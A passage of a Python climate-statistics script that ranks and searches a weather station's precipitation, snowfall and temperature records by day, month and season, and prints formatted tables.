    E_prcp_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_prcp_asc))
    #E_prcpDAYS_asc = E_prcpDAYS.copy()
    E_prcpDAYS.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_prcpDAYS))
    E_prcpDAYS_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_prcpDAYS_asc))
    E_snow.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_snow))
    E_snow_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_snow_asc))
    E_snowDAYS.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_snowDAYS))
    E_snowDAYS_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_snowDAYS_asc))
    E_tavg_asc = E_tavg.copy()
    E_tavg.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_tavg))
    E_tavg_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_tavg_asc))
    E_tmax_asc = E_tmax.copy()
    E_tmax.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_tmax))
    E_tmax_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_tmax_asc))
    E_tmin_asc = E_tmin.copy()
    E_tmin.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_tmin))
    E_tmin_asc.sort(key=lambda x:x.number); E_LENGTHS_OF_ALL.append(len(E_tmin_asc))

    # Programmatic mode: return the deduplicated sorted value histograms instead
    # of printing a table (used by the customStats machinery).
    if "customStatsRun" in kwargs and kwargs["customStatsRun"] == True:
        prcpaschist = sorted(list(set([x.number for x in E_prcp_asc])))
        prcpdeschist = sorted(list(set([x.number for x in E_prcp])),reverse=True)
        prcpDAYSaschist = sorted(list(set([x.number for x in E_prcpDAYS_asc])))
        prcpDAYSdeschist = sorted(list(set([x.number for x in E_prcpDAYS])),reverse=True)
        snowaschist = sorted(list(set([x.number for x in E_snow_asc])))
        snowdeschist = sorted(list(set([x.number for x in E_snow])),reverse=True)
        snowDAYSaschist = sorted(list(set([x.number for x in E_snowDAYS_asc])))
        snowDAYSdeschist = sorted(list(set([x.number for x in E_snowDAYS])),reverse=True)
        tmaxaschist = sorted(list(set([x.number for x in E_tmax_asc])))
        tmaxdeschist = sorted(list(set([x.number for x in E_tmax])),reverse=True)
        tminaschist = sorted(list(set([x.number for x in E_tmin_asc])))
        tmindeschist = sorted(list(set([x.number for x in E_tmin])),reverse=True)
        tavgaschist = sorted(list(set([x.number for x in E_tavg_asc])))
        tavgdeschist = sorted(list(set([x.number for x in E_tavg])),reverse=True)
        return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist
    else:
        print("")
        if attribute == "prcp":
            # NOTE(review): headers reuse startday/endday left over from the last
            # loop iteration above — only their month/day fields are displayed.
            print("{:^100}".format("Ranked Precipitation Amounts and Days for {} {} thru {} {}".format(calendar.month_abbr[startday.month],startday.day,calendar.month_abbr[endday.month],endday.day)))
            print("{:^103}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
            if EXCLD <= 5: print("{:^103}".format("Periods with {} Total days of Data".format(EXCLD+1)))
            else: print("{:^103}".format("Periods with >= {} Day(s) of Data".format(EXCLD+1)))
            print("{:-^103}".format(""))
            print("{:^70} {:^33}".format("Rain","Snow"))
            print("{:-^70} {:-^33}".format("",""))
            print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days"))
            print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","",""))
            # i..n are the current rank for each of the six columns; ties keep
            # the same rank number, and a rank prints its number only once
            # (tracked via ranked_*). A zero value retires a column early.
            i = 1;j = 1;k = 1;l = 1;m = 1;n = 1
            printed_j = 0; printed_l = 0
            ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = []
            for x in range(min(E_LENGTHS_OF_ALL)):
                if x == 0:
                    # First row: every column prints its rank-1 entry (snow
                    # columns stay blank when the top value is zero).
                    print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format(
                          1,".",E_prcp[x].year,"{:.2f}".format(E_prcp[x].number),
                          1,".",E_prcp_asc[x].year,"{:.2f}".format(E_prcp_asc[x].number),
                          1,".",E_prcpDAYS[x].year,E_prcpDAYS[x].number,
                          1,".",E_prcpDAYS_asc[x].year,E_prcpDAYS_asc[x].number,
                          1 if E_snow[x].number else "","." if E_snow[x].number > 0 else " ",
                          E_snow[x].year if E_snow[x].number > 0 else "","{:.1f}".format(E_snow[x].number) if E_snow[x].number > 0 else "",
                          1 if E_snowDAYS[x].number > 0 else "","." if E_snowDAYS[x].number > 0 else " ",
                          E_snowDAYS[x].year if E_snowDAYS[x].number > 0 else "",E_snowDAYS[x].number if E_snowDAYS[x].number > 0 else ""))
                    ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n)
                else:
                    # Record which ranks have already displayed their number.
                    if i not in ranked_i and i <= qty: ranked_i.append(i)
                    if j not in ranked_j and j <= qty: ranked_j.append(j)   #printed_j += 1
                    if k not in ranked_k and k <= qty: ranked_k.append(k)
                    if l not in ranked_l and l <= qty: ranked_l.append(l)   #printed_l += 1
                    if m not in ranked_m and m <= qty: ranked_m.append(m)
                    if n not in ranked_n and n <= qty: ranked_n.append(n)
                    # Advance a column's rank only when its value changed (ties
                    # share a rank).
                    if E_prcp[x].number != E_prcp[x-1].number: i += 1
                    if E_prcp_asc[x].number != E_prcp_asc[x-1].number: j += 1
                    if E_prcpDAYS[x].number != E_prcpDAYS[x-1].number: k += 1
                    if E_prcpDAYS_asc[x].number != E_prcpDAYS_asc[x-1].number: l += 1
                    if E_snow[x].number != E_snow[x-1].number: m += 1
                    if E_snowDAYS[x].number != E_snowDAYS[x-1].number: n += 1
                    # Zero totals retire the descending columns immediately.
                    if E_prcp[x].number == 0: i = qty + 1
                    #if printed_j == len(valid_yrs)-10: j = qty + 1
                    if E_prcpDAYS[x].number == 0: k = qty + 1
                    #if printed_l == len(valid_yrs)-10: l = qty + 1
                    if E_snow[x].number == 0: m = qty + 1
                    if E_snowDAYS[x].number == 0: n = qty + 1
                    if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                        print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format(
                              i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ",
                              E_prcp[x].year if i <= qty else "","{:.2f}".format(E_prcp[x].number) if i <= qty else "",
                              j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ",
                              E_prcp_asc[x].year if j <= qty else "","{:.2f}".format(E_prcp_asc[x].number) if j <= qty else "",
                              k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ",
                              E_prcpDAYS[x].year if k <= qty else "",E_prcpDAYS[x].number if k <= qty else "",
                              l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ",
                              E_prcpDAYS_asc[x].year if l <= qty else "",E_prcpDAYS_asc[x].number if l <= qty else "",
                              m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ",
                              E_snow[x].year if m <= qty else "","{:.1f}".format(E_snow[x].number) if m <= qty else "",
                              n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ",
                              E_snowDAYS[x].year if n <= qty else "",E_snowDAYS[x].number if n <= qty else ""))
                # Stop once all six columns have exhausted the requested quantity.
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break
        if attribute == "temp":
            print("{:^111}".format("Ranked Temperatures for {} {} thru {} {}".format(calendar.month_abbr[startday.month],startday.day,calendar.month_abbr[endday.month],endday.day)))
            print("{:^111}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
            print("{:^111}".format("Periods with >= {} Day(s) of Data".format(EXCLD+1)))
            print("{:-^111}".format(""))
            print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN"))
            print("{:-^36}|{:-^37}|{:-^36}".format("","",""))
            print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest"))
            print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","",""))
            # Same six-column ranked-print scheme as the prcp branch, applied to
            # tavg/tmax/tmin in descending (warmest) and ascending (coolest) order.
            i = 1; j = 1; k = 1; l = 1; m = 1; n = 1
            ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = []
            for x in range(len(E_tmax)):
                if x == 0:
                    print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                          1,".",E_tavg[x].year,"{:.1f}".format(E_tavg[x].number),
                          1,".",E_tavg_asc[x].year,"{:.1f}".format(E_tavg_asc[x].number),
                          1,".",E_tmax[x].year,"{:.1f}".format(E_tmax[x].number),
                          1,".",E_tmax_asc[x].year,"{:.1f}".format(E_tmax_asc[x].number),
                          1,".",E_tmin[x].year,"{:.1f}".format(E_tmin[x].number),
                          1,".",E_tmin_asc[x].year,"{:.1f}".format(E_tmin_asc[x].number)))
                    ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n)
                else:
                    if i not in ranked_i and i <= qty: ranked_i.append(i)
                    if j not in ranked_j and j <= qty: ranked_j.append(j)
                    if k not in ranked_k and k <= qty: ranked_k.append(k)
                    if l not in ranked_l and l <= qty: ranked_l.append(l)
                    if m not in ranked_m and m <= qty: ranked_m.append(m)
                    if n not in ranked_n and n <= qty: ranked_n.append(n)
                    if E_tavg[x].number != E_tavg[x-1].number: i += 1
                    if E_tavg_asc[x].number != E_tavg_asc[x-1].number: j += 1
                    if E_tmax[x].number != E_tmax[x-1].number: k += 1
                    if E_tmax_asc[x].number != E_tmax_asc[x-1].number: l += 1
                    if E_tmin[x].number != E_tmin[x-1].number: m += 1
                    if E_tmin_asc[x].number != E_tmin_asc[x-1].number: n += 1
                    if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                        print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                              i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ",
                              E_tavg[x].year if i <= qty else "","{:.1f}".format(E_tavg[x].number) if i <= qty else "",
                              j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ",
                              E_tavg_asc[x].year if j <= qty else "","{:.1f}".format(E_tavg_asc[x].number) if j <= qty else "",
                              k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ",
                              E_tmax[x].year if k <= qty else "","{:.1f}".format(E_tmax[x].number) if k <= qty else "",
                              l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ",
                              E_tmax_asc[x].year if l <= qty else "","{:.1f}".format(E_tmax_asc[x].number) if l <= qty else "",
                              m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ",
                              E_tmin[x].year if m <= qty else "","{:.1f}".format(E_tmin[x].number) if m <= qty else "",
                              n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ",
                              E_tmin_asc[x].year if n <= qty else "","{:.1f}".format(E_tmin_asc[x].number) if n <= qty else ""))
                # Stop once all six columns have exhausted the requested quantity.
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break
    print("")

def allDayRank(attribute,qty,**kw):
    """Returns a list of rankings, comparing only specific days to one another.
    If season keyword is present, month keyword will be ignored. If season and
    year are specified, only results from the season from the specific year
    will be used. If year and month are specified, only data from that time
    period will be used. If only month is specified, all data occurring from
    that month, regardless of year, will be used.

    allDayRank(attribute,quantity,**kwargs)

    Accepted Attributes: "prcp", "snow", "snwd", "tmax", "tmin", "tavg"

    Keyword Arguments (displayed in heirarchal order):
    season="season" -> limit season <"spring"|"summer"|"fall"|"winter">
    year=YYYY -> limit results to a specific year
    month=M -> limit results to a specific month
    ascending=False -> alters order of data (only affects temp attrs)
    custom=[m1,d1,m2,d2] -> limits results if the record falls within the date-range given

    EXAMPLE: allDayRank("snow",10) -> top 10 ranks all days acc. to snow
    allDayRank("prcp",15,season="summer") -> top 15 rain days in summer
    allDayRank("tmax",10,season="fall",year=2005) -> top 10 warmest daily highs from Fall 2005
    allDayRank("tmin",10,year=2009,ascending=True) -> top 10 coolest daily lows in 2009
    allDayRank("prcp",20,custom=[12,3,5,1]) -> top 20 rain-days between Dec3 and May1
    """
    # clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}}
    # clmt_vars_days["prcp"][amount] = [list, of, days, that, had, that, value]
    # consider adding a "finite" kwarg.
This setting would only report the quantity of days that a match was made rather than a potentially long list of days # consider adding an "order" or "reverse" kwarg valid_yrs = sorted([x for x in clmt.keys() if type(x) == int]) valid_metyrs = sorted([x for x in metclmt.keys() if type(x) == int]) hascustom = False hasseason = False hasyear = False hasmonth = False daysinmonths = ["_",31,28,31,30,31,30,31,31,30,31,30,31] # used to quickly determine validity of dates entered with custom keyword #ERROR CHECKS if attribute not in ["prcp","snow","snwd","tmax","tmin","tavg"]: return print('OOPS! "{}" is an Invalid Attribute. Try Again! Valid Attributes: "prcp","snow","snwd","tmax","tmin","tavg"'.format(attribute)) if type(qty) != int: return print("OOPS! Ensure the quantity is an integer! Try again!") # Custom Date Range if "custom" in kw: try: m1 = kw["custom"][0] d1 = kw["custom"][1] m2 = kw["custom"][2] d2 = kw["custom"][3] except: return print("OOPS! Something is wrong with the dates. Ensure a format of [m1,d1,m2,d2]") if type(kw["custom"]) not in [list,tuple]: return print("OOPS! Pass your custom range in a list. ex: [m1,d1,m2,d2]") elif any(type(x) != int for x in kw["custom"]) or len(kw["custom"]) != 4: return print("OOPS! Ensure all variables passed in your list are integers representing month/dates of interest and that a start/end month day sets are included, ex: [m1,d1,m2,d2]") elif (1 <= m1 <= 12) == False or (1 <= m2 <= 12) == False: return print("OOPS! An invalid month was entered.") elif (d1 <= 0 or d1 > daysinmonths[m1]) or (d2 <= 0 or d2 > daysinmonths[m2]): return print("OOPS! One or both of the dates are invalid.") elif m1 == m2 and d1 == d2: return print("OOPS! 
The first and second dates cannot be alike.") hascustom = True # If February 29, we want to default to the 28th if m1 == 2 and d1 == 29: d1 = 28 if m2 == 2 and d2 == 29: d2 = 28 # Specified Season elif "season" in kw: if kw["season"].lower() not in ["spring","summer","fall","winter"]: return print('OOPS! "{}" is an invalid season. Try again! Valid Seasons (all lower case):"spring","summer","fall","winter"'.format(kw["season"])) hasseason = True # for specifying a year of a season if "year" in kw: hasyear = True YEAR = int(kw["year"]) if YEAR not in valid_yrs: return print("OOPS! No data for the year {} found. Try again!".format(YEAR)) # Specifying a year elif "year" in kw: hasyear = True YEAR = int(kw["year"]) if YEAR not in clmt: return print("OOPS! No data for the year {} found. Try again!".format(YEAR)) # Focusing on a specific month in a specific year if "month" in kw: hasmonth = True MONTH = int(kw["month"]) if MONTH not in range(1,12+1): return print("OOPS! Invalid Month. Try again!") if MONTH not in clmt[YEAR]: return print("OOPS! No data for {} {} found. Try again!".format(calendar.month_name[MONTH],YEAR)) # Specifying a month elif "month" in kw: hasmonth = True MONTH = int(kw["month"]) if MONTH not in range(1,12+1): return print("OOPS! Invalid Month. 
Try again!") ########################## r = 0 printed = [] # Will hold the printed rankings print("\n-----------------------------------------------") # HEADER ------------------ if hascustom == True: print("Top {} Daily {} Records for the Range of {} {} thru {} {}".format( qty,attribute.upper(),d1,calendar.month_abbr[m1].upper(), d2,calendar.month_abbr[m2].upper() )) elif hasseason == True: if hasyear == True: print("Top {} Daily {} Records for {} {}".format(qty,attribute.upper(),kw["season"].capitalize(),YEAR)) else: print("Top {} Daily {} Records for {}".format(qty,attribute.upper(),kw["season"].capitalize())) elif hasyear == True: if hasmonth == True: print("Top {} Daily {} Records for {} {}".format(qty,attribute.upper(),calendar.month_name[MONTH],YEAR)) else: print("Top {} Daily {} Records for {}".format(qty,attribute.upper(),YEAR)) elif hasmonth == True: print("Top {} Daily {} Records for {}".format(qty,attribute.upper(),calendar.month_name[MONTH])) else: print("Top {} Daily {} Records for All-Time".format(qty,attribute.upper())) # ------------------------- # ------------------------- print("{}, {}".format(clmt["station"],clmt["station_name"])) if "ascending" in kw and attribute in ["tmax","tmin","tavg"]: if kw["ascending"] == True: keys = sorted([key for key in clmt_vars_days[attribute].keys()]) print("--- Coolest to Warmest ---") else: keys = sorted([key for key in clmt_vars_days[attribute].keys()],reverse=True) if attribute in ["tmax","tmin","tavg"]: print("--- Warmest to Coolest ---") print("-----------------------------------------------") # ------------------------- validated = {} # 12-3 to 1,10 # (1959,1,7) if hascustom == True: for x in keys: for y in range(len(clmt_vars_days[attribute][x])): # When the 2nd month refers to an earlier month(or the same) if datetime.date(2100,m2,d2) < datetime.date(2100,m1,d1): try: if (clmt_vars_days[attribute][x][y] >= datetime.date(clmt_vars_days[attribute][x][y].year,m1,d1)) or (clmt_vars_days[attribute][x][y] <= 
datetime.date(clmt_vars_days[attribute][x][y].year,m2,d2)): if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) except Exception as e: pass # When the 2nd month is later than the first month else: if datetime.date(clmt_vars_days[attribute][x][y].year,m1,d1) <= clmt_vars_days[attribute][x][y] <= datetime.date(clmt_vars_days[attribute][x][y].year,m2,d2): if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasseason == True and hasyear == False: # Only assess a season # metclmt[y][s]["valid"] = [3,4,5] # clmt_vars_days[attribute][x][y] for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].month <= 2 and clmt_vars_days[attribute][x][y].year-1 in metclmt and clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year-1][kw["season"]]["valid"]: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif clmt_vars_days[attribute][x][y].month >= 3 and clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year][kw["season"]]["valid"]: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasseason == True and hasyear == True: # Only assess a season of a particular year # metclmt[y][s]["valid"] = [3,4,5] # clmt_vars_days[attribute][x][y] for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if kw["season"].lower() == "winter": if clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year][kw["season"]]["valid"]: if clmt_vars_days[attribute][x][y].month in [1,2] and clmt_vars_days[attribute][x][y].year == YEAR+1: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: 
validated[x].append(clmt_vars_days[attribute][x][y]) if clmt_vars_days[attribute][x][y].month == 12 and clmt_vars_days[attribute][x][y].year == YEAR: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) else: if clmt_vars_days[attribute][x][y].year == YEAR and clmt_vars_days[attribute][x][y].month in metclmt[clmt_vars_days[attribute][x][y].year][kw["season"]]["valid"]: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasyear == True and hasmonth == False: # Only assess a particular year for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].year == YEAR: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasyear == True and hasmonth == True: # Only assess a particular month of a particular year for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].year == YEAR and clmt_vars_days[attribute][x][y].month == MONTH: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) elif hasmonth == True: # Only assess data from a particular month for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if clmt_vars_days[attribute][x][y].month == MONTH: if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) else: # Assesses data from the entire record for x in keys: for y in range(len(clmt_vars_days[attribute][x])): if x not in validated: validated[x] = [clmt_vars_days[attribute][x][y]] else: validated[x].append(clmt_vars_days[attribute][x][y]) for x in validated: r += 1 if r > qty: break for y in range(len(validated[x])): if attribute == "prcp": print("{:>2}{} {:>5.2f} - {}".format(r if 
def _allMonthRank_row(r, printed, attribute, value, date):
    # Print a single ranking row for allMonthRank. The rank number and the
    # trailing "." are shown only while the rank is not yet in `printed`;
    # repeats of an already-printed rank get blank padding instead.
    rankstr = r if r not in printed else " "
    dotstr = "." if r not in printed else " "
    if attribute == "prcp":
        print("{:>2}{} {:6.2f} - {} {}".format(rankstr, dotstr, value, calendar.month_abbr[date.month], date.year))
    elif attribute in ["prcpDAYS", "snowDAYS", "snwdDAYS"]:
        print("{:>2}{} {:2} - {} {}".format(rankstr, dotstr, value, calendar.month_abbr[date.month], date.year))
    else:   # snow, snwd, tmax, tmin, tavg
        print("{:>2}{} {:6.1f} - {} {}".format(rankstr, dotstr, value, calendar.month_abbr[date.month], date.year))

def allMonthRank(attribute, qty, **kw):
    """Returns a list of rankings, comparing only specific months to one
    another. Optional season keyword included to limit results to a specific
    season. Optional ascending keyword, if set to True, will reverse the order
    of results

    allMonthRank(attribute,quantity,**kwargs)

    Accepted Attributes: "prcp", "prcpDAYS", "snow", "snowDAYS", "snwd",
        "snwdDAYS", "tmax", "tmin", "tavg"

    Keyword Arguments (Optional):
        season="season" -> limit season <"spring"|"summer"|"fall"|"winter">
        ascending=False -> alters order of data (only affects temp or prcp attrs)

    EXAMPLE: allMonthRank("snow",10) -> top 10 ranks all months acc. to snow
             allMonthRank("prcp",15,season="summer") -> top 15 rain months in summer
             allMonthRank("tmin",10,ascending=True) -> top 10 coolest months based on avg lows
    """
    valid_season = {"spring":[3,4,5],"summer":[6,7,8],"fall":[9,10,11],"winter":[12,1,2]}
    hasseason = False
    # ERROR CHECKS
    # FIX: the old message contained ',,' and omitted "prcpDAYS" from the list
    if attribute not in ["prcp","prcpDAYS","snow","snowDAYS","snwd","snwdDAYS","tmax","tmin","tavg"]:
        return print('OOPS! "{}" is an Invalid Attribute. Try Again! Valid Attributes: "prcp","prcpDAYS","snow","snowDAYS","snwd","snwdDAYS","tmax","tmin","tavg"'.format(attribute))
    if type(qty) != int:
        return print("OOPS! Ensure the quantity is an integer! Try again!")
    # Specified Season
    if "season" in kw:
        if kw["season"].lower() not in ["spring","summer","fall","winter"]:
            return print('OOPS! "{}" is an invalid season. Try again! Valid Seasons (all lower case):"spring","summer","fall","winter"'.format(kw["season"]))
        hasseason = True
    ##########################
    r = 0
    printed = []    # Will hold the printed rankings
    appendr = False # Set when at least one row for the current rank was shown
    print("\n-----------------------------------------------")
    # HEADER ------------------
    if hasseason == True:
        print("Top {} Monthly {} Records Inclusive of {} Months Only".format(qty, attribute.upper(), kw["season"].capitalize()))
    else:
        print("Top {} Monthly {} Records for All-Time".format(qty, attribute.upper()))
    # -------------------------
    print("{}, {}".format(clmt["station"], clmt["station_name"]))
    # ascending=True only applies to temp/prcp attributes; snow attrs always descend
    if "ascending" in kw and kw["ascending"] == True and attribute not in ["snow","snowDAYS","snwd","snwdDAYS"]:
        keys = sorted([key for key in clmt_vars_months[attribute].keys()])
        if attribute in ["tmax","tmin","tavg"]: print("--- Coolest to Warmest ---")
        if attribute in ["prcp"]: print("--- Driest to Wettest ---")
    else:
        keys = sorted([key for key in clmt_vars_months[attribute].keys()], reverse=True)
        if attribute in ["tmax","tmin","tavg"]: print("--- Warmest to Coolest ---")
        if attribute in ["prcp"]: print("--- Wettest to Driest ---")
        if attribute in ["prcpDAYS","snow","snowDAYS","snwd","snwdDAYS"]: print("--- Greatest to Least ---")
    print("-----------------------------------------------")
    # -------------------------
    # Gather value -> [month-dates], filtered to the requested season's months
    # if a season was given (clmt_vars_months maps reading -> list of dates).
    metkeys = {}
    for x in keys:
        for d in clmt_vars_months[attribute][x]:
            if hasseason == False or d.month in valid_season[kw["season"]]:
                if x not in metkeys:
                    metkeys[x] = [d]
                else:
                    metkeys[x].append(d)
    # tavg months are built from two readings per day, hence the doubled threshold
    thresh = excludemonth * 2 if attribute == "tavg" else excludemonth
    for x in metkeys:
        r += 1
        if r > qty:
            break
        for d in metkeys[x]:
            # With ascending=True, months with too few records are suppressed so
            # partial months cannot pollute the "least" end of the rankings.
            if "ascending" not in kw or kw["ascending"] == False or (kw["ascending"] == True and clmt[d.year][d.month]["recordqty"] > thresh):
                appendr = True
                _allMonthRank_row(r, printed, attribute, x, d)
        if r not in printed and appendr == True:
            printed.append(r)
        appendr = False
    #-------------------------------------------
    print("")
def valueSearch(stat_type, op, value, **kwargs):
    """Quick function to designate a value, and the days or months where the
    attribute of interest exceeded, equalled, or was less than the passed value

    valueSearch("attribute","operator",value,**{sortmonth=False})

    * "attribute" must be in ["prcp","snow","snwd","tavg","tmax","tmin"]
      (aliases such as "rain", "hi", or "low" are also accepted)
    * "operator" must be in ["<=","<","==","!=",">",">="]
    * value must be an integer or a float

    OPT **kwarg: sortmonth = True --> If set to true, it will do a value search
        based on monthly data instead of daily (no snwd data is available for
        months though)

    EXAMPLE: valueSearch("prcp",">=",5) --> returns a list of all days on
        record where 5+ inches of rain fell
    """
    # ERROR HANDLING
    if stat_type.lower() not in ["rain","prcp","precip","snow","snwd","temp","temps","temperature","temperatures","avgtemp","tavg","tempavglist","tmax","hi","high","tmin","lo","low"]:
        return print("OOPS! {} is not a supported stat category. Try again!".format(stat_type))
    # FIX: "!=" is documented above and handled below, but was missing from the
    # old validation list, so valueSearch(...,"!=",...) was always rejected
    if op not in ["<","<=","==","!=",">",">="]:
        return print("OOPS! '{}' is not a supported operator. Try again!".format(op))
    if type(value) not in [int, float]:
        return print("OOPS! Only integers or floats are supported for value intake")
    # Format passed variables: normalize aliases onto the canonical attribute names
    stat_type = stat_type.lower()   # Convert to lower-case for homogeniety
    if stat_type in ["rain","prcp","precip"]: stat_type = "prcp"
    if stat_type in ["avgtemp","tavg","tempavglist","temp","temps","temperature","temperatures"]: stat_type = "tavg"
    if stat_type in ["tmax","hi","high"]: stat_type = "tmax"
    if stat_type in ["tmin","lo","low"]: stat_type = "tmin"
    # ("snow" and "snwd" are already canonical)
    if "sortmonth" in kwargs and kwargs["sortmonth"] == True:
        CLMTDICT = clmt_vars_months
        stype = "month"
    else:   # Just sorting indv days
        CLMTDICT = clmt_vars_days
        stype = "day"
    results = []
    # CLMTDICT[stat_type] maps a reading value (VAR) -> list of dates (DAY)
    for VAR in CLMTDICT[stat_type]:
        for DAY in CLMTDICT[stat_type][VAR]:
            if op == "<":
                # "less than" month searches skip months with too few records --
                # partial months would otherwise match spuriously
                if stype == "month":
                    if VAR < value and clmt[DAY.year][DAY.month]["recordqty"] > excludemonth: results.append(DAY)
                else:
                    if VAR < value: results.append(DAY)
            elif op == "<=":
                if stype == "month":
                    if VAR <= value and clmt[DAY.year][DAY.month]["recordqty"] > excludemonth: results.append(DAY)
                else:
                    if VAR <= value: results.append(DAY)
            elif op == "!=":
                if VAR != value: results.append(DAY)
            elif op == "==":
                if VAR == value: results.append(DAY)
            elif op == ">=":
                if VAR >= value: results.append(DAY)
            elif op == ">":
                if VAR > value: results.append(DAY)
    results.sort()
    if "sortmonth" in kwargs and kwargs["sortmonth"] == True:
        # Monthly summary line (snwd has no monthly aggregate)
        if stat_type == "prcp": print("Total months where the Total Rainfall {} {}: {}".format(op, value, len(results)))
        elif stat_type == "snow": print("Total months where the Total Snowfall {} {}: {}".format(op, value, len(results)))
        elif stat_type in ["tmax","tmin"]: print("Total months where the Average {} {} {}: {}".format(stat_type.upper(), op, value, len(results)))
        elif stat_type == "tavg": print("Total months where the Average Temperature {} {}: {}".format(op, value, len(results)))
        else: return print("*** valueSearch does not report on monthly variations of {} ***".format(stat_type))
        # Ask before dumping a long listing
        if len(results) <= 50: stillprint = True
        else:
            stillpr = input("print results? ('y'/'n'): ")
            if stillpr == "y": stillprint = True
            else: stillprint = False
        if stillprint == True:
            if stat_type == "prcp":
                for x in results: print("{:6.2f}: {} {}".format(round(sum(clmt[x.year][x.month]["prcp"]), 2), calendar.month_abbr[x.month], x.year))
            if stat_type == "snow":
                for x in results: print("{:5.1f}: {} {}".format(round(sum(clmt[x.year][x.month]["snow"]), 1), calendar.month_abbr[x.month], x.year))
            #if stat_type == "snwd":
